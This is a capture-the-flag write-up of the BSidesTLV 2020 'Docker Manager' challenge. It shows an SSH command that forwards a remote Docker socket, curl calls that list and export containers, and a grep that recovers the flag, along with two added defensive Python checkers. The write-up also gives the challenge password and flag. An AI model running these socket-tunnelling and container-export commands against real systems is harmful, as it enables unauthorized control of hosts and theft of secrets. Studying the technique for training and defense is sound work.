Docker Manager
- Category: Misc
- 350 Points
- Solved by the JCTF Team
Description
Solution
We connect to the SSH server using sshpass -p 'd0ck3rm4n4g3r' ssh [email protected] -p 8000
and immediately get the following screen:
In this screen we can try to enter a password, however we don't know what the correct password is.
We can't seem to kill this application or execute anything interesting within it.
At some point, the following hint was published by the organizers:
SSH + Docker = :broken_heart:
Indeed! Using SSH tunneling we can expose the Docker daemon socket, which allows us to use the Docker API.
We can create the tunnel by running the following command:
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# sshpass -p 'd0ck3rm4n4g3r' ssh -N -L localhost:9999:/var/run/docker.sock [email protected] -p 8000
This means that when we access port 9999 on our localhost, the request will be tunneled to the Unix socket /var/run/docker.sock on the remote host.
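Whether this tunnel is accepted is decided by the server's sshd_config. The following added example (not part of the original write-up) evaluates the global section of a config for the two OpenSSH keywords that govern Unix-socket forwarding, AllowStreamLocalForwarding and DisableForwarding. The sample configs and the /app/manager path are constructed, and Match blocks are not evaluated.

```python
# Added example, not from the original write-up. All sample configs are constructed.
# sshd_config defaults for the keywords that govern Unix-socket (StreamLocal) forwarding.
DEFAULTS = {"allowstreamlocalforwarding": "yes", "disableforwarding": "no"}

DEFAULT_LIKE = """
# forwarding keywords left at their defaults; /app/manager is a hypothetical path
PasswordAuthentication yes
ForceCommand /app/manager
"""
# AllowTcpForwarding covers TCP destinations only; forwarding to a Unix socket
# is governed by AllowStreamLocalForwarding, which is still at its default here.
TCP_ONLY = "AllowTcpForwarding no\n"
HARDENED = """
DisableForwarding yes
ForceCommand /app/manager
"""

def effective_settings(config_text):
    """Return the values sshd would use: the first occurrence of a keyword wins."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ", 1).split()
        key = parts[0].lower()          # keywords are case-insensitive
        if key == "match":
            break                       # conditional blocks are out of scope here
        if key in DEFAULTS and key not in seen and len(parts) > 1:
            seen[key] = parts[1].lower()
    return {**DEFAULTS, **seen}

def unix_socket_forward_allowed(config_text):
    """True if `ssh -L <port>:/path/to.sock` would be accepted by this config."""
    s = effective_settings(config_text)
    if s["disableforwarding"] == "yes":  # overrides every other forwarding option
        return False
    # "local" means local from the ssh client's point of view, i.e. -L
    return s["allowstreamlocalforwarding"] in ("yes", "all", "local")

if __name__ == "__main__":
    for name, cfg in [("default-like", DEFAULT_LIKE), ("tcp-only", TCP_ONLY),
                      ("hardened", HARDENED)]:
        print(name, "-> socket forwarding allowed:", unix_socket_forward_allowed(cfg))
```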
Let's try this:
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl -s http://localhost:9999/version | python -m json.tool
{
    "ApiVersion": "1.40",
    "Arch": "amd64",
    "BuildTime": "2020-03-11T01:29:16.000000000+00:00",
    "Components": [
        {
            "Details": {
                "ApiVersion": "1.40",
                "Arch": "amd64",
                "BuildTime": "2020-03-11T01:29:16.000000000+00:00",
                "Experimental": "false",
                "GitCommit": "afacb8b",
                "GoVersion": "go1.12.17",
                "KernelVersion": "4.19.104-microsoft-standard",
                "MinAPIVersion": "1.12",
                "Os": "linux"
            },
            "Name": "Engine",
            "Version": "19.03.8"
        },
        {
            "Details": {
                "GitCommit": "7ad184331fa3e55e52b890ea95e65ba581ae3429"
            },
            "Name": "containerd",
            "Version": "v1.2.13"
        },
        {
            "Details": {
                "GitCommit": "dc9208a3303feef5b3839f4323d9beb36df0a9dd"
            },
            "Name": "runc",
            "Version": "1.0.0-rc10"
        },
        {
            "Details": {
                "GitCommit": "fec3683"
            },
            "Name": "docker-init",
            "Version": "0.18.0"
        }
    ],
    "GitCommit": "afacb8b",
    "GoVersion": "go1.12.17",
    "KernelVersion": "4.19.104-microsoft-standard",
    "MinAPIVersion": "1.12",
    "Os": "linux",
    "Platform": {
        "Name": "Docker Engine - Community"
    },
    "Version": "19.03.8"
}
We have contact! Now, let's enumerate the containers:
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl -s http://localhost:9999/containers/json | python -m json.tool
[
    {
        "Command": "docker-entrypoint.sh /usr/sbin/sshd -D",
        "Created": 1593249326,
        "HostConfig": {
            "NetworkMode": "docker-manager_default"
        },
        "Id": "ca3b76fc5a79dbfaffa9c11456d5ccecd43f03f37e8cfdb7becc27cc59ed3f1d",
        "Image": "docker-manager_challenge",
        "ImageID": "sha256:f2def1180f982e1c9955725a219ce8532d305ae6e01e66c9643f7dbe0c3ad8f7",
        "Labels": {
            "com.docker.compose.config-hash": "0345033b5a07fe9cd165abbf678cd54dbc8a05ae93d1f715eafab117973e436c",
            "com.docker.compose.container-number": "1",
            "com.docker.compose.oneoff": "False",
            "com.docker.compose.project": "docker-manager",
            "com.docker.compose.project.config_files": "docker-manager/docker-compose.yml",
            "com.docker.compose.project.working_dir": "/mnt/e/Projects/BSidesTLVCTF/ctf20/dockerfiles/docker-manager/api/docker-manager",
            "com.docker.compose.service": "challenge",
            "com.docker.compose.version": "1.25.5",
            "desktop.docker.io/wsl-distro": "Ubuntu-20.04"
        },
        "Mounts": [
            {
                "Destination": "/var/run/docker.sock",
                "Mode": "rw",
                "Propagation": "rprivate",
                "RW": true,
                "Source": "/run/desktop/mnt/host/wsl/docker-desktop-bind-mounts/Ubuntu-20.04/71329c4cc6e32171553fa81d044eb31d1a3aac52ba9376c4a99f4505c494cf5b",
                "Type": "bind"
            }
        ],
        "Names": [
            "/docker-manager_challenge_1"
        ],
        "NetworkSettings": {
            "Networks": {
                "docker-manager_default": {
                    "Aliases": null,
                    "DriverOpts": null,
                    "EndpointID": "d51f6464dfb631039c8a278f671cf68ae2615048f4f279d9ee1a761397871179",
                    "Gateway": "172.29.0.1",
                    "GlobalIPv6Address": "",
                    "GlobalIPv6PrefixLen": 0,
                    "IPAMConfig": null,
                    "IPAddress": "172.29.0.2",
                    "IPPrefixLen": 16,
                    "IPv6Gateway": "",
                    "Links": null,
                    "MacAddress": "02:42:ac:1d:00:02",
                    "NetworkID": "0f2a5ae4391f59b48cb8a5dd2344b2b304bea6a3497c8ab0fd0cbc3029616c4e"
                }
            }
        },
        "Ports": [
            {
                "IP": "0.0.0.0",
                "PrivatePort": 22,
                "PublicPort": 2222,
                "Type": "tcp"
            }
        ],
        "State": "running",
        "Status": "Up Less than a second"
    }
]
Solution 1:
We can download the container and grep for the flag :-)
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl http://localhost:9999/containers/ca3b76fc5a79dbfaffa9c11456d5ccecd43f03f37e8cfdb7becc27cc59ed3f1d/export > image.tar
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# mkdir image
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# tar -xf image.tar -C image
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# grep -Ri BSidesTLV image
image/app/flag:BSidesTLV2020{SSH_F0RWARD1NG_F0R_FUN_4ND_PR0F1T}
Solution 2:
We have one container, let's view its details and search for the flag:
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl -s http://localhost:9999/containers/ca3b76fc5a79dbfaffa9c11456d5ccecd43f03f37e8cfdb7becc27cc59ed3f1d/json | python3 -m json.tool | grep -i bsides
"FLAG=BSidesTLV2020{SSH_F0RWARD1NG_F0R_FUN_4ND_PR0F1T}"
"com.docker.compose.project.working_dir": "/mnt/e/Projects/BSidesTLVCTF/ctf20/dockerfiles/docker-manager/api/docker-manager",
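Both solutions rest on two conditions visible in the API responses: the container bind-mounts docker.sock read-write, and the flag sits in an environment variable. The following added example (not part of the original write-up) checks a host's own /containers/json and inspect responses for those two conditions. The sample data is constructed and trimmed to the fields used, modelled on the output above; the container IDs, the second container and the SECRET_HINTS list are assumptions.

```python
# Added example, not from the original write-up.
SOCKET_PATHS = {"/var/run/docker.sock", "/run/docker.sock"}
SECRET_HINTS = ("FLAG", "PASSWORD", "SECRET", "TOKEN", "KEY")  # assumed name hints

# Constructed sample shaped like GET /containers/json (IDs are placeholders).
CONTAINERS = [
    {"Id": "id-challenge", "Names": ["/docker-manager_challenge_1"],
     "Mounts": [{"Type": "bind", "Destination": "/var/run/docker.sock", "RW": True}]},
    {"Id": "id-web", "Names": ["/web_1"],
     "Mounts": [{"Type": "volume", "Destination": "/data", "RW": True}]},
]
# Constructed sample shaped like GET /containers/<id>/json, keyed by container ID.
INSPECT = {
    "id-challenge": {"Config": {"Env": ["PATH=/usr/local/bin:/usr/bin",
                                        "FLAG=placeholder-value"]}},
    "id-web": {"Config": {"Env": ["LANG=C.UTF-8"]}},
}

def audit(containers, inspect_by_id):
    """Return (container, finding, detail) tuples for the two conditions."""
    findings = []
    for c in containers:
        name = c["Names"][0].lstrip("/")
        # 1. Docker socket bind-mounted into the container: anything that can
        #    reach that path inside the container can drive the Docker API.
        for m in c.get("Mounts") or []:
            if m.get("Type") == "bind" and m.get("Destination") in SOCKET_PATHS:
                findings.append((name, "docker-socket-mount",
                                 "rw" if m.get("RW") else "ro"))
        # 2. Secret-looking environment variables: inspect returns them in
        #    clear text. Only the variable name is reported, never the value.
        env = inspect_by_id.get(c["Id"], {}).get("Config", {}).get("Env") or []
        for entry in env:
            var = entry.split("=", 1)[0]
            if any(hint in var.upper() for hint in SECRET_HINTS):
                findings.append((name, "secret-in-env", var))
    return findings

if __name__ == "__main__":
    for finding in audit(CONTAINERS, INSPECT):
        print(*finding, sep="\t")
```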
The flag: BSidesTLV2020{SSH_F0RWARD1NG_F0R_FUN_4ND_PR0F1T}